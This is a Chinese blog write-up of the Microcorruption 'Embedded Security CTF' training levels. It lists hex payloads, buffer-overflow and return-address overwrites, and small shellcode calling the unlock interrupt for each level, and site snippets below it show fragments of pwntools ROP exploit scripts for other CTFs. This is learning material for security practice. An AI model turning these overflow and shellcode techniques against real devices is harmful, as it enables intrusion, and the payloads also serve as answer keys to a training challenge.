Embedded Security CTF-1

最新推荐文章于 2021-12-23 03:15:45 发布
最新推荐文章于 2021-12-23 03:15:45 发布
阅读量1k 收藏
点赞数
分类专栏: 学习经历 文章标签: MIPS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/122076950
版权

Embedded Security CTF (1)

Tutorial

有几个不同的指令;

reset:重启cpu

break:地址不加*

unbreak:取消断点

let: gdb下的set

solve: 发送解决问题的请求

payload: 70617373776f7264

New Orleans

内存里直接就能找到了, 但发现好像还有个gets的栈溢出, 预期解payload: 7c30544d492f5a

Sydney

第一次遇到了大端法诶, payload: 7936602430334f66

Hanoi

我傻逼了这题, 一直在看valid里的中断, 气死👴了, 不愧是一星越南payload: c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0

Cusco

ret2text, payload: 222222222222222222222222222222224644

Reykjavik

先用它网站自带的翻译一下十六进制数在这里插入图片描述

然后动调配合着看一下, 确定0x2464就是unlock, 且关键就是标亮的的那一行, so, 只要输入021b(我一开始是这样认为的然后就麻了), 但因为大小端的问题, 得输入1b02, 艹了

payload: 1b02

Whitehorse:

一开始经典不晓得干嘛, 然后瞅了一下别的师傅, 知道要去看一眼手册, 发现unlock的关键是INT(0x7f), 然后再控制一下ret返回地址, 得到类似以下的汇编代码, 然后丢网站提供的转换器转换为shellcode即可

push #0x7f;
call INT;
padding...(77*8)
0x3e7c;

得记得立即数要加#, 否则涵义不同

俺的payload: 30127f00b012324577777777777777777c3e

Montevideo:

gets到了全局变量中, 结果因为strcpy还是鸟用没有(其实还是有的, 出现了00截断)

下面就是我绕00的思路, 实在不晓得怎么再缩了, 总感觉能更短点来着hh

mov #0x1fc, r8;
rra r8;
rra r8;
push r8
call #0x454c;

payload: 3840fc01081108110812b0124c457777ee43

Johannesburg

我猜这题还是用了gets, 但加了00截断(确实, 不过很简单, 覆盖个0x16的检测即可, 这玩意居然有点像canary哈哈哈), 之后就是ret2text

payload: 1616161616161616161616161616161616164644

Santa Cruz

o, shit, 好长…

它在栈上定义了两个数组, 低地址是usename, 高地址是passwd, 但是两个数组之间塞了两个字节, 依据地址从低到高分别为passwd下界和上界(虽然上下界对最后passwd又没啥影响了hhh), 而程序流程会对passwd的长短进行检查是否在[上界, 下界]中(但username存在的越界写因为没有进行判断, 所以这个上下界可以靠溢出而改变的), 在上下界检查后, 还会检查栈上一个flag位是否为0

tst.b -0x6(r4)

所以其实最后我们的passwd只是起到一个重新置零的作用罢了…

最后我整理了一下思路就是username越界写控制ret的地址(上下界随便你), 然后passwd起到在padding中重新置零的作用

payload1: 7777777777777777777777777777777777017777777777777777777777777777777777777777777777774a44

payload2: 777777777777777777777777777777777700

一些MIPS总结:

根据题目总结的, 所以不一定对:

中断调用号居然是放在栈上, dynamic function传参三个即以内是寄存器传参, 顺序为r15->r14->r13

北岛静石
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之LAMPSecurity CTF4 靶机渗透(SQL注入)
afei001
08-06 927
  练习环境     攻击机:kali     靶机:LAMPSecurity: CTF4     下载地址:https://download.vulnhub.com/lampsecurity/ctf4.zip      1.发现靶机端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.99.177 netmask 255.
CTF练习和相关信息的网站
weixin_42037232的博客
04-21 700
我也是刚起步,找朋友和google了很多乱七八糟的网站,这里记一下。 知乎上有一位作者写的很全,包含交流平台,练习平台,漏洞平台,在线工具,大牛博客地址和其他综合类网站。我这里只是补充了一些,他写的比我全得多。传送门: 一个4年CTF入门者自述:曾经掉过的坑与干货总结   国内网站: - 实验吧:shiyianbar     这里有很多视频课程,我还没好好看,不过很多人都对这个网站评价很...
渗透测试攻防练习实验室 (资源分享,国外在线教程)
热门推荐
关注互联网安全的小虾米一枚
07-26 2万+
Vulnerable Web Applications Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butterfly Security Project ht
Embedded Security CTF-2
eeeeeight的博客
12-23 1095
先挖个坑,还有三道就刷完了
CTF-PWN-babydriver (linux kernel pwn+UAF)
SuperGate的博客
02-26 2419
第一次接触linux kernal pwn,和传统的pwn题区别较大,需要比较多的前置知识,以及这种题的环境搭建、运行和调试相关的知识。 文章目录Linux内核及内核模块Linux内核(Kernal)内核模块(LKM)iocltstruct credSLUB&SLAB内核态函数题目分析程序概述漏洞分析exp内核调试相关 Linux内核及内核模块 Linux内核(Kernal) 这里只对内...
ctf101-Reverse Engineering
Starr
06-15 555
Reverse Engineering 文章目录Reverse Engineering1. Assembly / Machine Code1.1 From Source to Compilation1.2 x86-641.2.1 x86-64 Registers1.2.2 Instructions1.2.3 Execution1.2.4 Examples1.2.5 Example Ex...
CTF资源
镜湖
08-05 909
一 个人成长 此部分内容来自 TK 教主分享的腾讯玄武实验室内部例会 PPT 资料。 1 个人成长 确立个人方向,结合工作内容,找出对应短板: 该领域主要专家们的工作是否都了解? 相关网络协议、文件格式是否熟悉? 相关的技术和主要工具是否看过、用过? 阅读只是学习过程的起点,不能止于阅读: 工具的每个参数每个菜单都要看、要试。 学习网络协议要实际抓包分析,学习文件格式要读代码实现。 学习老漏洞一定要调试,搞懂别人代码每一个字节的意义,之后要完全自己重写一个 Exploit。 细节、细节、细节,刨根问
QtEmbedded-4.8.5-arm.zip
10-31
《QtEmbedded-4.8.5-arm.zip:深入探索Ubuntu下的Qt ARM编译环境》 在软件开发领域,Qt是一个广泛使用的跨平台应用程序框架,它允许开发者构建功能丰富的图形用户界面,支持多种操作系统,包括Linux、Windows、Mac ...
MySQL-embedded-5.6.22-1.el6.i686.rpm
最新发布
04-26
MySQL-embedded-5.6.22-1.el6.i686.rpm MySQL-server-5.6.22-1.el6.i686.rpm MySQL-shared-5.6.22-1.el6.i686.rpm MySQL-shared-compat-5.6.22-1.el6.i686.rpm MySQL-test-5.6.22-1.el6.i686.rpm mysql-test 免费...
Embedded-database-spring-test:一个库,用于为Spring集成测试创建隔离的嵌入式数据库
01-30
嵌入式数据库 :information_selector: 嵌入式数据库2.0 Beta 1版本可供测试在安装和测试此发行版之前,请仔细阅读。 更新的文档可在此处获得: : 感谢您的时间和反馈。介绍这个项目的主要目标是使编写基于PostgreSQL...
embedded-linux-slides.pdf
02-28
A program is considered free when its license offers to all its users the following four freedoms ▶ Freedom to run the software for any purpose ▶ Freedom to study the software and to change it ...
paho.mqtt.embedded-c-master.zip_MQTT编程_c mqtt linux_mqtt_paho mq
07-13
标题中的“paho.mqtt.embedded-c-master.zip”是一个开源项目,主要针对MQTT协议的C语言实现,名为Paho MQTT Embedded C。Paho是IBM和Oracle发起的一个开源项目,旨在提供一组支持多种开放标准的消息传递协议(如...
2021羊城杯pwn部分wp
eeeeeight的博客
09-12 6501
前言: 羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6027
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2087
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
Nov 26, 21在macOS 12.0.1上布置pwn环境
eeeeeight的博客
11-27 1761
前言: 不是让民那桑在mac上做amd架构的题目,我布置环境是为了以后方便pwn arm架构的题目/设备之类的(逃) Pwn environment: lldb && voltron && tmuxinator && pwntools: Because outstanding performance of Plugins in gdb like pwndbg, gef and so on. I choose to install gdb on my M1 Ma
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1596
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
Embedded DOS 6-XL:嵌入式系统的全面DOS指南
"Embedded DOS 6-XL 是一款专为嵌入式系统设计的全功能操作系统,配合开发者指南和命令参考,旨在为开发者提供在嵌入式设备上构建和管理系统的详细指导。由General Software, Inc.开发并享有版权,出版于1990年至...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值